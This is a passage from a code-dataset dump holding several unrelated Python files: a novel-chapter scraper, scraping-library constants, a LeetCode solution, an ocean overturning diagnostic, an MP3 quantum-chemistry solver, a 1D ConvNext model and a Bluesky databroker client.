response.text)\n\n path = 'E:/mjy-workspace/python/Python_Reptile/resource/'\n\n file = open(path + str(n) + \".txt\", \"w\", encoding='gbk')\n\n for c in context:\n s = c.replace(\"chapterContent:\", \"\")\n s = s.replace(\"\\\\u003Cp\\\\u003E\", \"\")\n s = s.replace(\"\\\\r\\\\u003C\\\\u002Fp\\\\u003E\", \"\")\n s = s.replace(\"\\\\u003C\\\\u002Fp\\\\u003E\", \"\")\n s = s.replace('\"', '')\n file.write(s)\n\n file.close()\n\n\ndef get_number(base_url):\n res = requests.get(base_url)\n number = re.findall(\"目录(.\\\\d*)\", res.text)\n num = number[0].replace(\"(\", \"\")\n for i in range(1, int(num)):\n get_content(base_url + str(i), i)\n\n\nif __name__ == '__main__':\n get_number('https://book.qq.com/book-detail/46888796')\n","repo_name":"ykongl/Python","sub_path":"Python_Reptile/qq_novel.py","file_name":"qq_novel.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8329967861","text":"# =============================================================================\n# Minet Default Values Collection\n# =============================================================================\n#\n# Listing sane default values used throughout the whole 
library.\n#\nfrom urllib3 import Timeout\n\n\n# Fetch-related\nDEFAULT_GROUP_PARALLELISM = 1\nDEFAULT_GROUP_BUFFER_SIZE = 25\nDEFAULT_THROTTLE = 0.2\nDEFAULT_CONNECT_TIMEOUT = 5\nDEFAULT_READ_TIMEOUT = 25\nDEFAULT_URLLIB3_TIMEOUT = Timeout(connect=DEFAULT_CONNECT_TIMEOUT, read=DEFAULT_READ_TIMEOUT)\nDEFAULT_SPOOFED_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0'\n\nCOOKIE_BROWSERS = {\n    'chrome',\n    'chromium',\n    'firefox',\n    'opera',\n    'edge'\n}\n","repo_name":"lebelgique/minet","sub_path":"minet/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
+{"seq_id":"35672429820","text":"'''\nhttps://leetcode.com/explore/interview/card/google/59/array-and-strings/467/\n'''\n\nclass Solution(object):\n    def isValid(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: bool\n        \"\"\"\n        dict_s = {\n            \"]\" : \"[\",\n            \"}\" : \"{\",\n            \")\" : \"(\"\n        }\n\n        stack = []\n\n        for c in s:\n            if c in dict_s.values():\n                stack.append(c)\n            elif c in dict_s.keys():\n                stack.append(c)\n                if len(stack) > 1 and stack[-2] == dict_s[c]:\n                    stack.pop()\n                    stack.pop()\n        return len(stack) == 0\n    ","repo_name":"DemonZhou/leetcode","sub_path":"Valid Parentheses.py","file_name":"Valid Parentheses.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6689506339","text":"# Calculate diagnostics of the ocean model meridional overturning\n# Original ferret calculation doesn't handle staggered grids properly, so just use\n# simple numpy arrays here\n\n# Basin file is\n\n# Arguments are archive directory and run id name\n\nimport netCDF4, sys, os, glob\nfrom pathlib import Path\nimport numpy as np\n\narchivedir = sys.argv[1]\nrunid = sys.argv[2]\n\n# Check for any new complete years\nflist = sorted(list(glob.glob(os.path.join(archivedir,'ocean_month.nc-[0-9]*1231'))))\nif not flist:\n    print(\"Nothing to process\")\n    sys.exit(0)\n\nlastfile = flist[-1]\nlastfile_year = int(lastfile[-8:-4])\n\ndef isleap(year):\n    # Proleptic gregorian\n    if year % 100 == 0:\n        return year%400==0\n    else:\n        return year%4==0\n\ndef process(d):\n    # These are on the yu_ocean grid\n    ty_trans = d.variables['ty_trans'][:]\n    ty_trans_gm = d.variables['ty_trans_gm'][:]\n\n    # To match ferret behaviour, choose the region using the coordinate bounds\n    # depth[k] has bounds depth_edges[k] and depth_edges[k+1]\n    depth = d.variables['st_ocean'][:]\n    depth_edges = d.variables['st_edges_ocean'][:]\n    # Level that includes depth 3000 is first for which bottom edges is > 3000\n    ilev_3000 = np.argmax(depth_edges > 3000) - 1\n    ilev_5000 = np.argmax(depth_edges > 5000) - 1\n    # print(\"Levels\", ilev_3000, ilev_5000, depth[ilev_3000], depth[ilev_5000])\n\n    lat = d.variables['grid_yu_ocean'][:]\n    # lat[k] has bounds lat_edges[k] and lat_edges[k+1], except at N extreme which isn't needed here\n    lat_edges = d.variables['grid_yt_ocean'][:]\n    ilat_m60 = np.argmax(lat_edges > -60) - 1\n    ilat_30 = np.argmax(lat_edges > 30) - 1\n    ilat_60 = np.argmax(lat_edges > 60) - 1\n    ilat_26 = np.argmin(abs(lat-26)) - 1\n    # print(\"Lats\", ilat_m60, ilat_30, lat[ilat_m60], lat[ilat_30])\n\n    dmask = netCDF4.Dataset(\"/g/data/p66/ars599/plot_paper_data/lsmask_20110618.nc\")\n    # Only want the top level of the mask\n    mask = dmask.variables['mask_tucell'][0]\n\n    moc_glb = ty_trans.sum(axis=3).cumsum(axis=1) + ty_trans_gm.sum(axis=3)\n    # aabwf = 
MOC_gbl[y=-80:-60@min,z=1:3000@min]\n aabwf = moc_glb[:,:ilev_3000+1,:ilat_m60+1].min(axis=(1,2))\n # sodc = MOC_gbl[y=-60:30@min, z=3000:5000@min]\n sodc = moc_glb[:,ilev_3000:ilev_5000+1,ilat_m60:ilat_30+1].min(axis=(1,2))\n\n # Atlantic defined by mask=2, 4. Want to mask out non-Atlantic points so invert this\n mask_atl = np.logical_not(np.logical_or(mask==2, mask==4))\n # Automatic broadcasting doesn't work\n # ty_trans_atl = np.ma.masked_array(ty_trans, mask_atl[np.newaxis, np.newaxis,:,:])\n mask_atl = np.broadcast_to(mask_atl, ty_trans.shape)\n ty_trans_atl = np.ma.masked_array(ty_trans, mask_atl)\n ty_trans_gm_atl = np.ma.masked_array(ty_trans_gm, mask_atl)\n moc_atl = ty_trans_atl.sum(axis=3).cumsum(axis=1) + ty_trans_gm_atl.sum(axis=3)\n # nadwf = MOC_atl[y=30:60@max, z=1:3000@max]\n nadwf = moc_atl[:,:ilev_3000+1,ilat_30:ilat_60+1].max(axis=(1,2))\n amoc26n = moc_atl[:,:ilev_3000+1,ilat_26].max(axis=1)\n\n return aabwf, sodc, nadwf, amoc26n\n\ndef createfile(filename,lastfile):\n # Create a new file for the global mean with time and level dimensions\n dnew = netCDF4.Dataset(filename, 'w')\n # Any file will do for getting dimensions etc\n d = netCDF4.Dataset(lastfile)\n\n # Dimensions and coordinate variables\n dnew.createDimension('nv', 2)\n time = d.variables['time']\n # This is inconsistent across model runs for some reason\n tbounds_name = getattr(time, \"bounds\")\n assert tbounds_name[:5] == 'time_'\n bounds_name = tbounds_name[5:]\n time_bounds = d.variables[tbounds_name]\n for newvar in ('time', 'year'):\n dnew.createDimension(newvar, None)\n dnew.createVariable(newvar, np.float64, (newvar,))\n tnew = dnew.variables[newvar]\n for attr in time.ncattrs():\n # Missing value in the bounds shouldn't occur\n # MOM files incorrectly set calendar as gregorian rather\n # than proleptic\n if attr not in (\"missing_value\", \"_FillValue\", \"calendar\", \"calendar_type\"):\n setattr(tnew, attr, getattr(time,attr))\n tnew.calendar = \"proleptic_gregorian\"\n # This case isn't handled correctly by the previous iteration\n if newvar == 'year':\n tnew.bounds = f'year_{bounds_name}'\n dnew.createVariable(f'{newvar}_{bounds_name}', np.float64, (newvar,'nv'))\n tnew = dnew.variables[f'{newvar}_{bounds_name}']\n for attr in time_bounds.ncattrs():\n # Missing value in the bounds shouldn't occur\n if attr not in (\"missing_value\", \"_FillValue\"):\n setattr(tnew, attr, getattr(time_bounds,attr))\n\n # Variables\n dnew.createVariable('nadwf', np.float32, ('time',))\n nadwf = dnew.variables['nadwf']\n nadwf.units = '1e9 kg/s'\n nadwf.standard_name = \"ocean_y_overturning_mass_streamfunction\"\n nadwf.long_name = \"North Atlantic deep water formation\"\n dnew.createVariable('amoc26n', np.float32, ('time',))\n amoc26n = dnew.variables['amoc26n']\n amoc26n.units = '1e9 kg/s'\n amoc26n.standard_name = \"ocean_y_overturning_mass_streamfunction\"\n amoc26n.long_name = \"Maximum AMOC at 26N\"\n dnew.createVariable('aabwf', np.float32, ('time',))\n aabwf = dnew.variables['aabwf']\n aabwf.units = '1e9 kg/s'\n aabwf.standard_name = \"ocean_y_overturning_mass_streamfunction\"\n aabwf.long_name = \"Antarctic bottom water formation\"\n dnew.createVariable('sodc', np.float32, ('time',))\n sodc = dnew.variables['sodc']\n sodc.units = '1e9 kg/s'\n sodc.standard_name = \"ocean_y_overturning_mass_streamfunction\"\n sodc.long_name = \"Deep cell originating from Southern Ocean\"\n for vname in ('nadwf', 'amoc26n', 'aabwf', 'sodc'):\n # Create annual mean\n var = dnew.variables[vname]\n annname = '%s_ann' % 
vname\n dnew.createVariable(annname, np.float32, ('year',))\n annvar = dnew.variables[annname]\n for attr in var.ncattrs():\n setattr(annvar, attr, getattr(var,attr))\n d.close()\n return dnew\n\nfname = 'ocean_MOC_%s.nc' % runid\nif Path(fname).exists():\n dout = netCDF4.Dataset(fname, 'r+')\nelse:\n dout = createfile(fname, lastfile)\n\ntime = dout.variables['time']\nnt = len(time)\n\nif nt%12 != 0:\n raise Exception(\"Unexpected state: In file %s. nt=%d is not a multiple of 12\" % (fname, nt))\n\ntry:\n time_bounds = dout.variables['time_bounds']\n bounds_name = 'bounds'\nexcept KeyError:\n time_bounds = dout.variables['time_bnds']\n bounds_name = 'bnds'\nnadwf = dout.variables['nadwf']\namoc26n = dout.variables['amoc26n']\naabwf = dout.variables['aabwf']\nsodc = dout.variables['sodc']\n\nyearvar = dout.variables['year']\nyear_bounds = dout.variables[f'year_{bounds_name}']\n\nif nt > 0:\n lastdate = netCDF4.num2date(time[-1], time.units, time.calendar)\n lastyear = lastdate.year\nelse:\n # Set lastyear to year of first file -1 so loop starts correctly\n firstfile = flist[0]\n lastyear = int(firstfile[-8:-4]) - 1\n\nif lastfile_year > lastyear:\n print('Data to process', runid, lastyear+1, lastfile_year)\n # Loop is over expected years, so missing files will cause an error.\n for year in range(lastyear+1, lastfile_year+1):\n flist_year = glob.glob(os.path.join(archivedir,'ocean_month.nc-%4.4d[0-9]*' % (year)))\n if isleap(year):\n mwts = np.array([31,29,31,30,31,30,31,31,30,31,30,31])/366.\n else:\n mwts = np.array([31,28,31,30,31,30,31,31,30,31,30,31])/365.\n # Initial check that we have 12 months. May get a failure if\n # mppcombine is still running.\n nm = 0\n for f in sorted(flist_year):\n d = netCDF4.Dataset(f)\n time_in = d.variables['time']\n nm += len(time_in)\n if nm != 12:\n print(\"Missing files for year %d, nm=%d:\" % (year, nm), flist_year, file=sys.stderr)\n raise Exception(\"Missing files\")\n for f in sorted(flist_year):\n d = netCDF4.Dataset(f)\n time_in = d.variables['time']\n time_bounds_in = d.variables[f'time_{bounds_name}']\n offset = len(time)\n # Check whether the dates match\n if offset:\n lastdate = netCDF4.num2date(time[-1], time.units, time.calendar)\n newdate = netCDF4.num2date(time_in[0], time_in.units, 'proleptic_gregorian')\n if not 25 <= (newdate-lastdate).days <= 35:\n print(\"Date mismatch\", lastdate, newdate, newdate-lastdate, file=sys.stderr)\n raise Exception('Date mismatch')\n\n result = process(d)\n\n for t in range(len(time_in)):\n\n aabwf[offset+t] = result[0][t]*1e-9\n sodc[offset+t] = result[1][t]*1e-9\n nadwf[offset+t] = result[2][t]*1e-9\n amoc26n[offset+t] = result[3][t]*1e-9\n\n # Handle possible changes in the base date\n # Ocean model files incorrectly have calendar attribute\n # set as gregorian, but really use proleptic_gregorian\n date = netCDF4.num2date(time_in[t], time_in.units, 'proleptic_gregorian')\n print(\"DATE\", date)\n time[offset+t] = netCDF4.date2num(date, time.units, time.calendar)\n mon = date.month - 1 # Convert to an index\n date = netCDF4.num2date(time_bounds_in[t], time_in.units, 'proleptic_gregorian')\n time_bounds[offset+t] = netCDF4.date2num(date, time.units, time.calendar)\n # Update the annual means\n annt = (offset+t)//12\n for vname in dout.variables:\n v = dout.variables[vname]\n if 'time' in v.dimensions:\n if vname.startswith('time'):\n annvar = dout.variables[vname.replace('time','year')]\n else:\n annvar = dout.variables['%s_ann' % vname]\n if vname == f'time_{bounds_name}':\n if mon==0:\n annvar[annt] = 
v[offset+t]\n elif mon==11:\n # End bounds\n annvar[annt,1] = v[offset+t,1]\n else:\n if mon==0:\n annvar[annt] = mwts[mon]*v[offset+t]\n else:\n annvar[annt] += mwts[mon]*v[offset+t]\n d.close()\n\n dout.sync() # Sync to disk once per year\n\ndout.close()\n","repo_name":"MartinDix/access_monitoring","sub_path":"ocean_MOC_update.py","file_name":"ocean_MOC_update.py","file_ext":"py","file_size_in_byte":10647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1755330730","text":"from moha.system.hamiltonian.chemical_hamiltonian import *\nfrom moha.system.operator.base import OperatorNames\nfrom moha.posthf.pt.auxiliary import *\nfrom moha.io.log import log, timer\n\nimport numpy as np\nimport copy\n\n__all__ = ['MP3Solver']\n\nclass MP3Solver(object):\n \"\"\"Third-order Moller-Plesset perturbation solver.\n\n Attributes\n ----------\n ham\n Chemical Hamiltonian.\n\n wfn\n Hartree Fock wavefunction.\n\n hf_results : dict\n Hartree Fock calculation results.\n\n Methods\n -------\n __init__(self,ham,wfn,hf_results)\n Initialize the solver.\n\n kernel(self)\n Kernel of the solver.\n\n assign_hamiltonian(self,ham)\n Assign the chemical Hamiltonian to the solver.\n\n assign_wavefunction(self,wfn)\n Assign the Hartree Fock wavefunction to the solver.\n\n assign_hartree_fock_results(self,hf_results)\n Assign the Hartree Fock calculation results to the solver.\n \"\"\"\n def __init__(self,ham,wfn,hf_results):\n \"\"\"Initialize the solver.\n\n Attributes\n ----------\n ham\n Chemical Hamiltonian.\n\n wfn\n Hartree Fock wavefunction.\n\n hf_results : dict\n Hartree Fock calculation results.\n \"\"\"\n self.assign_hamiltonian(ham)\n self.assign_wavefunction(wfn)\n self.assign_hartree_fock_results(hf_results)\n\n @timer.with_section(\"MP3\")\n def kernel(self):\n \"\"\"Kernel of the solver.\n\n Returns\n -------\n results : dict\n MP3 calculation results.\n \"\"\" \n log.hline()\n log('MP3 Calculation Section'.format())\n log.hline()\n \n ham = copy.deepcopy(self.ham)\n wfn = copy.deepcopy(self.wfn)\n hf_results = self.hf_results\n \n nspatial = ham.nspatial \n occ = wfn.occ\n C = wfn.coefficients\n eorbitals = wfn.orbital_energies\n \n Emp2 = 0.0\n Eri = ham.operators[OperatorNames.Eri]\n Eri.basis_transformation(C)\n for i in range(occ['alpha']):\n for j in range(occ['alpha']):\n for a in range(occ['alpha'],nspatial):\n for b in range(occ['alpha'],nspatial):\n Emp2 += Eri[i,a,j,b]*(2*Eri[i,a,j,b]-Eri[i,b,j,a])\\\n /(eorbitals[i] + eorbitals[j] -eorbitals[a] - eorbitals[b])\n\n Emp3 = 0.0\n Eri = ham.operators[OperatorNames.Eri].double_bar\n for i in range(occ['alpha']):\n for j in range(occ['alpha']):\n for k in range(occ['alpha']):\n for l in range(occ['alpha']):\n for a in range(occ['alpha'],nspatial):\n for b in range(occ['alpha'],nspatial):\n Emp3 += (1/8.0)*Eri[i,j,a,b]*Eri[k,l,i,j]*Eri[a,b,k,l]\\\n /((eorbitals[i] + eorbitals[j] -eorbitals[a] - eorbitals[b])\\\n *(eorbitals[k] + eorbitals[l] -eorbitals[a] - eorbitals[b]))\n for i in range(occ['alpha']):\n for j in range(occ['alpha']):\n for a in range(occ['alpha'],nspatial):\n for b in range(occ['alpha'],nspatial):\n for c in range(occ['alpha'],nspatial):\n for d in range(occ['alpha'],nspatial):\n Emp3 += (1/8.0)*Eri[i,j,a,b]*Eri[a,b,c,d]*Eri[c,d,i,j]\\\n /((eorbitals[i] + eorbitals[j] -eorbitals[a] - eorbitals[b])\\\n *(eorbitals[i] + eorbitals[j] -eorbitals[c] - eorbitals[d]))\n for i in range(occ['alpha']):\n for j in range(occ['alpha']):\n for k in range(occ['alpha']):\n for a in 
range(occ['alpha'],nspatial):\n                    for b in range(occ['alpha'],nspatial):\n                        for c in range(occ['alpha'],nspatial):\n                            Emp3 += Eri[i,j,a,b]*Eri[k,b,c,j]*Eri[a,c,i,k]\\\n                            /((eorbitals[i] + eorbitals[j] -eorbitals[a] - eorbitals[b])\\\n                            *(eorbitals[i] + eorbitals[k] -eorbitals[a] - eorbitals[c]))\n    \n        log.hline()\n        log('MP3 Results'.format())\n        log.hline()\n        log('{0:2s} {1:3f}'.format('Escf', hf_results['total_energy']))\n        log('{0:2s} {1:3f}'.format('Emp2', Emp2))\n        log('{0:2s} {1:3f}'.format('Emp3', Emp3))\n        log('{0:2s} {1:3f}'.format('Etot', hf_results['total_energy']+Emp2+Emp3))\n        log.hline()\n\n        results = {\n            \"success\": True,\n            \"mp2_energy\":Emp2,\n            \"mp3_energy\":Emp3,\n            \"total_energy\":hf_results['total_energy']+Emp2+Emp3\n        }\n\n        return results\n\n    def assign_hamiltonian(self,ham):\n        \"\"\"Assign the chemical Hamiltonian to the solver.\n\n        Attributes\n        ----------\n        ham\n            Chemical Hamiltonian.\n        \"\"\"\n        self.ham = ham\n\n    def assign_wavefunction(self,wfn):\n        \"\"\"Assign the Hartree Fock wavefunction to the solver.\n\n        Attributes\n        ----------\n        wfn\n            Hartree Fock wavefunction.\n        \"\"\"\n        self.wfn = wfn\n\n    def assign_hartree_fock_results(self,hf_results):\n        \"\"\"Assign the Hartree Fock calculation results to the solver.\n\n        Attributes\n        ----------\n        hf_results : dict\n            Hartree Fock calculation results.\n\n        Raises\n        ------\n        TypeError\n            If Hartree Fock calculation results is not a dictionary.\n        \"\"\"\n        if not isinstance(hf_results, dict):\n            raise TypeError(\"Hartree Fock calculation results must be a dictionary\")\n        self.hf_results = hf_results\n","repo_name":"ZhaoYilin/moha","sub_path":"moha/posthf/pt/mp3.py","file_name":"mp3.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"}
+{"seq_id":"9785682888","text":"import torch.nn as nn\nimport math\n\n\nclass InvertedResidualBlock(nn.Module):\n\n    def __init__(self, in_channels, out_channels, expand_ratio, first_stage=False, first_block=False):\n        super().__init__()\n        \n        hidden_dim = out_channels * expand_ratio\n        \n        self.transform_conv = None\n        if(not first_stage and first_block):\n            self.transform_conv = nn.Conv1d(in_channels, out_channels, kernel_size=1, stride=2)\n\n        self.spatial_mixing = nn.Sequential(\n            nn.Conv1d(out_channels, out_channels, kernel_size=7, padding=3, groups=out_channels, bias=False),\n            nn.BatchNorm1d(out_channels),\n        )\n\n        self.feature_mixing = nn.Sequential(\n            nn.Conv1d(out_channels, hidden_dim, kernel_size=1, stride=1),\n            nn.GELU(),\n        )\n\n        self.bottleneck_channels = nn.Sequential(\n            nn.Conv1d(hidden_dim, out_channels, kernel_size=1, stride=1),\n        )\n\n    def forward(self, x):\n        if(self.transform_conv):\n            x = self.transform_conv(x)\n\n        out = self.spatial_mixing(x)\n        out = self.feature_mixing(out)\n        out = self.bottleneck_channels(out)\n\n        return x + out\n\nclass ConvNext(nn.Module):\n    \n    def __init__(self):\n        super().__init__()\n\n        \n        self.stem = nn.Sequential(\n            nn.Conv1d(256, 96, kernel_size=4, stride=4, bias=False),\n            nn.BatchNorm1d(96),\n            nn.GELU(),\n        )\n\n        self.stage_cfgs = [\n            [4, 96, 3]\n        ]\n\n        in_channels = 96\n\n        layers = []\n        for idx, curr_stage in enumerate(self.stage_cfgs):\n            expand_ratio, out_channels, num_blocks = curr_stage\n            for block_idx in range(num_blocks):\n                \n                block = InvertedResidualBlock(\n                    in_channels=in_channels,\n                    out_channels=out_channels,\n                    expand_ratio=expand_ratio,\n                    first_stage=True if idx == 0 else False,\n                    first_block=True if block_idx == 0 else False\n                )\n                layers.append(block)\n                \n                in_channels = 
out_channels \n                \n        self.layers = nn.Sequential(*layers)\n\n        self.final_block = nn.Sequential(\n            nn.Conv1d(in_channels, 256, kernel_size=1, padding=0, stride=1, bias=False),\n            nn.BatchNorm1d(256),\n            nn.GELU()\n        )\n\n        \n\n        self._initialize_weights()\n\n    def _initialize_weights(self):\n        for m in self.modules():\n            if isinstance(m, nn.Conv1d):\n                n = m.kernel_size[0] * m.out_channels\n                m.weight.data.normal_(0, math.sqrt(2. / n))\n                if m.bias is not None:\n                    m.bias.data.zero_()\n            elif isinstance(m, nn.BatchNorm1d):\n                m.weight.data.fill_(1)\n                m.bias.data.zero_()\n            elif isinstance(m, nn.Linear):\n                m.weight.data.normal_(0, 0.01)\n                m.bias.data.zero_()\n\n    def forward(self, x):\n        out = self.stem(x)\n        out = self.layers(out)\n        feats = self.final_block(out)\n\n        return feats","repo_name":"yonas-g/stt_low_resource","sub_path":"utils/ConvNext.py","file_name":"ConvNext.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6747868510","text":"import collections.abc\nimport json\nimport keyword\nimport warnings\n\nfrom tiled.adapters.utils import IndexCallable\nfrom tiled.client.container import DEFAULT_STRUCTURE_CLIENT_DISPATCH, Container\nfrom tiled.client.utils import handle_error\nfrom tiled.utils import safe_json_dump\n\nfrom .common import BlueskyEventStreamMixin, BlueskyRunMixin, CatalogOfBlueskyRunsMixin\nfrom .queries import PartialUID, RawMongo, ScanID\nfrom .document import Start, Stop, Descriptor, EventPage, DatumPage, Resource\n\n\n_document_types = {\n    \"start\": Start,\n    \"stop\": Stop,\n    \"descriptor\": Descriptor,\n    \"event_page\": EventPage,\n    \"datum_page\": DatumPage,\n    \"resource\": Resource,\n}\n# There are methods that IPython will try to call.\n# We special-case them because we want to avoid the getattr\n# resulting in an unnecessary network hit just to raise\n# AttributeError.\n_IPYTHON_METHODS = {\"_ipython_canary_method_should_not_exist_\", \"_repr_mimebundle_\"}\n\n\nclass BlueskyRun(BlueskyRunMixin, Container):\n    \"\"\"\n    This encapsulates the data and metadata for one Bluesky 'run'.\n\n    This adds some bluesky-specific conveniences to the standard client Container.\n    \"\"\"\n\n    @property\n    def start(self):\n        \"\"\"\n        The Run Start document. A convenience alias:\n\n        >>> run.start is run.metadata[\"start\"]\n        True\n        \"\"\"\n        return self.metadata[\"start\"]\n\n    @property\n    def stop(self):\n        \"\"\"\n        The Run Stop document. A convenience alias:\n\n        >>> run.stop is run.metadata[\"stop\"]\n        True\n        \"\"\"\n        return self.metadata[\"stop\"]\n\n    @property\n    def v2(self):\n        return self\n\n    def documents(self, fill=False):\n        # For back-compat with v2:\n        if fill == \"yes\":\n            fill = True\n        elif fill == \"no\":\n            fill = False\n        elif fill == \"delayed\":\n            raise NotImplementedError(\"fill='delayed' is not supported\")\n        else:\n            fill = bool(fill)\n        link = self.item[\"links\"][\"self\"].replace(\n            \"/metadata\", \"/documents\", 1\n        )\n        request = self.context.http_client.build_request(\n            \"GET\",\n            link,\n            params={\"fill\": fill},\n            headers={\"Accept\": \"application/json-seq\"},\n        )\n        response = self.context.http_client.send(request, stream=True)\n        try:\n            if response.is_error:\n                response.read()\n                handle_error(response)\n            for chunk in response.iter_bytes():\n                for line in chunk.decode().splitlines():\n                    item = json.loads(line)\n                    yield (item[\"name\"], _document_types[item[\"name\"]](item[\"doc\"]))\n        finally:\n            response.close()\n\n    def __getattr__(self, key):\n        \"\"\"\n        Let run.X be a synonym for run['X'] unless run.X already exists.\n\n        This behavior is the same as with pandas.DataFrame.\n        \"\"\"\n        # The wisdom of this kind of \"magic\" is arguable, but we\n        # need to support it for backward-compatibility reasons.\n        if key in _IPYTHON_METHODS:\n            raise AttributeError(key)\n        if key in self:\n            return self[key]\n        raise AttributeError(key)\n\n    def __dir__(self):\n        # Build a list of entries that are valid attribute names\n        # and add them to __dir__ so that they tab-complete.\n        tab_completable_entries = [\n            entry\n            for entry in self\n            if (entry.isidentifier() and (not keyword.iskeyword(entry)))\n        ]\n        return super().__dir__() + tab_completable_entries\n\n    def describe(self):\n        \"For back-compat with intake-based BlueskyRun\"\n        warnings.warn(\n            \"This will be removed. Use .metadata directly instead of describe()['metadata'].\",\n            DeprecationWarning,\n        )\n        return {\"metadata\": self.metadata}\n\n    def __call__(self):\n        warnings.warn(\n            \"Do not call a BlueskyRun. For now this returns self, for \"\n            \"backward-compatibility, but it will be removed in a future \"\n            \"release.\",\n            DeprecationWarning,\n            stacklevel=2,\n        )\n        return self\n\n    def read(self):\n        raise NotImplementedError(\n            \"Reading any entire run is not supported. \"\n            \"Access a stream in this run and read that.\"\n        )\n\n    to_dask = read\n\n\nclass BlueskyEventStream(BlueskyEventStreamMixin, Container):\n    \"\"\"\n    This encapsulates the data and metadata for one 'stream' in a Bluesky 'run'.\n\n    This adds some bluesky-specific conveniences to the standard client Container.\n    \"\"\"\n\n    @property\n    def descriptors(self):\n        return self.metadata[\"descriptors\"]\n\n    @property\n    def _descriptors(self):\n        # For backward-compatibility.\n        # We do not normally worry about backward-compatibility of _ methods, but\n        # for a time databroker.v2 *only* had _descriptors and not descriptors,\n        # and I know there is user code that relies on that.\n        warnings.warn(\"Use .descriptors instead of ._descriptors.\", stacklevel=2)\n        return self.descriptors\n\n    def __getattr__(self, key):\n        \"\"\"\n        Let run.X be a synonym for run['X'] unless run.X already exists.\n\n        This behavior is the same as with pandas.DataFrame.\n        \"\"\"\n        # The wisdom of this kind of \"magic\" is arguable, but we\n        # need to support it for backward-compatibility reasons.\n        if key in _IPYTHON_METHODS:\n            raise AttributeError(key)\n        if key in self:\n            return self[key]\n        raise AttributeError(key)\n\n    def __dir__(self):\n        # Build a list of entries that are valid attribute names\n        # and add them to __dir__ so that they tab-complete.\n        tab_completable_entries = [\n            entry\n            for entry in self\n            if (entry.isidentifier() and (not keyword.iskeyword(entry)))\n        ]\n        return super().__dir__() + tab_completable_entries\n\n    def read(self, *args, **kwargs):\n        \"\"\"\n        Shortcut for reading the 'data' (as opposed to timestamps or config).\n\n        That is:\n\n        >>> stream.read(...)\n\n        is equivalent to\n\n        >>> stream[\"data\"].read(...)\n        \"\"\"\n        return self[\"data\"].read(*args, **kwargs)\n\n    def to_dask(self):\n        warnings.warn(\n            \"\"\"Do not use this method.\nInstead, set dask when first creating the client, as in\n\n    >>> catalog = from_uri(\"...\", \"dask\")\n\nand then read() will return dask objects.\"\"\",\n            DeprecationWarning,\n            stacklevel=2,\n        )\n        return self.new_variation(\n            structure_clients=DEFAULT_STRUCTURE_CLIENT_DISPATCH[\"dask\"]\n        ).read()\n\n\nclass CatalogOfBlueskyRuns(CatalogOfBlueskyRunsMixin, Container):\n    \"\"\"\n    This adds some bluesky-specific conveniences to the standard client Container.\n\n    >>> catalog.scan_id[1234]  # scan_id lookup\n    >>> catalog.uid[\"9acjef\"]  # (partial) uid lookup\n    >>> catalog[1234]  # automatically do scan_id lookup for positive integer\n    >>> catalog[\"9acjef\"]  # automatically do (partial) uid lookup for string\n    >>> catalog[-5]  # automatically do catalog.values()[-N] for negative integer\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.scan_id = IndexCallable(self._lookup_by_scan_id)\n        self.uid = IndexCallable(self._lookup_by_partial_uid)\n        self._v1 = None\n\n    @property\n    def v2(self):\n        return self\n\n    def __getitem__(self, key):\n        # For convenience and backward-compatibility reasons, we support\n        # some \"magic\" here that is helpful in an interactive setting.\n        if isinstance(key, str):\n            # CASE 1: Interpret key as a uid or partial uid.\n            if len(key) == 36:\n                # This looks like a full uid. Try direct lookup first.\n                try:\n                    return super().__getitem__(key)\n                except KeyError:\n                    # Fall back to partial uid lookup below.\n                    pass\n            return self._lookup_by_partial_uid(key)\n        elif isinstance(key, int):\n            if key > 0:\n                # CASE 2: Interpret key as a scan_id.\n                return self._lookup_by_scan_id(key)\n            else:\n                # CASE 3: Interpret key as a recency lookup, as in\n                # `catalog[-1]` is the latest entry.\n                return self.values()[key]\n        elif isinstance(key, slice):\n            if (key.start is None) or (key.start >= 0):\n                raise ValueError(\n                    \"For backward-compatibility reasons, slicing here \"\n                    \"is limited to negative indexes. \"\n                    \"Use .values() to slice how you please.\"\n                )\n            return self.values()[key]\n        elif isinstance(key, collections.abc.Iterable):\n            # We know that isn't a str because we check that above.\n            # Recurse.\n            return [self[item] for item in key]\n        else:\n            raise ValueError(\n                \"Indexing expects a string, an integer, or a collection of strings and/or integers.\"\n            )\n\n    def _lookup_by_scan_id(self, scan_id):\n        results = self.search(ScanID(scan_id, duplicates=\"latest\"))\n        if not results:\n            raise KeyError(f\"No match for scan_id={scan_id}\")\n        else:\n            # By construction there must be only one result. Return it.\n            return results.values().first()\n\n    def _lookup_by_partial_uid(self, partial_uid):\n        results = self.search(PartialUID(partial_uid))\n        if not results:\n            raise KeyError(f\"No match for partial_uid {partial_uid}\")\n        else:\n            # By construction there must be only one result. Return it.\n            return results.values().first()\n\n    def get_serializer(self):\n        from tiled.server.app import get_root_tree\n\n        if not hasattr(self.context.http_client, \"app\"):\n            raise NotImplementedError(\"Only works on local application.\")\n        tree = self.context.http_client.app.dependency_overrides[get_root_tree]()\n        return tree.get_serializer()\n\n    def search(self, query):\n        # For backward-compatibility, accept a dict and interpret it as a Mongo\n        # query against the 'start' documents.\n        if isinstance(query, dict):\n            query = RawMongo(start=query)\n        return super().search(query)\n\n    @property\n    def v1(self):\n        \"Accessor to legacy interface.\"\n        if self._v1 is None:\n            from .v1 import Broker\n\n            self._v1 = Broker(self)\n        return self._v1\n\n    def post_document(self, name, doc):\n        link = self.item[\"links\"][\"self\"].replace(\n            \"/metadata\", \"/documents\", 1\n        )\n        response = self.context.http_client.post(\n            link,\n            content=safe_json_dump({\"name\": name, 